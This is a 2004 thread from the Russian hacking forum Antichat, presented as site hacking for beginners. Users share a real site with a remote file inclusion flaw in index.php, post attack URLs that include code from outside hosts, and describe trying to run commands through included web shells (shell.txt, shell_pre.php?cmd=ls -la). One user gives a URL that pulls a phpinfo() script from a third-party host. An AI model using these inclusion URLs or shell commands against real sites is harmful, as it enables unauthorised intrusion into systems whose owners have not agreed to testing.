Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Взлом сайта. Для начаниющих (https://forum.antichat.xyz/showthread.php?t=4480)

kyzmi4 15.12.2004 20:04

Взлом сайта. Для начаниющих
 
Даю адрес сайта, жирном выделяю намек на уязвимсоть:
http://klezz.fatal.ru/index.php?v/full.htm

Вот подумайте.
Меня она очень удивила когда я там (кто знает тот поймет) увидел сайт античата =) :rolleyes:
Сайт ломается!!!

virgoz 16.12.2004 00:44

где ты тама увидел сайт античата?
а сайт не ломается...
команды не хочет выполнять...

SURRENDER 16.12.2004 05:59

kyzmi4, либо адрес карявый, либо это не переменная...

Егорыч+++ 16.12.2004 10:23

Да ломается.... Но я точно ломать не буду

virgoz 16.12.2004 18:29

как вы команды выполняете?
пишет аот что:
Цитата:

Warning: shell_exec(): Cannot execute using backquotes in Safe Mode in http://[target]/shell.txt on line 12
и вот:
Цитата:

Warning: system(): Cannot execute a blank command in http://[target]/shell_pre.php?cmd=ls%20-la on line 3
че не так?

Егорыч+++ 16.12.2004 18:44

в принципе все не так... не все так тривиально...

SHiTS 16.12.2004 19:58

а я как всегда ниче не понял http://klezz.fatal.ru/index.php?v/full.htm
че тут за уязвимость?

Егорыч+++ 16.12.2004 20:03

http://klezz.fatal.ru/index.php?http://www.ru - а вот это понятно? или все еще нет?

SHiTS 16.12.2004 20:04

неа,ладно,не надо объяснять,всё равно не пойму(

Че Гевара 16.12.2004 21:40

А что тут не понимать ?
http://klezz.fatal.ru/index.php?http....ru/pizdez.php - это тоже непонятно ?
где
http://xssteam.narod.ru/pizdez.php
содержит одну строчку ...
PHP код:

   <?
   
 phpinfo
();
   
 
?>



Время: 17:47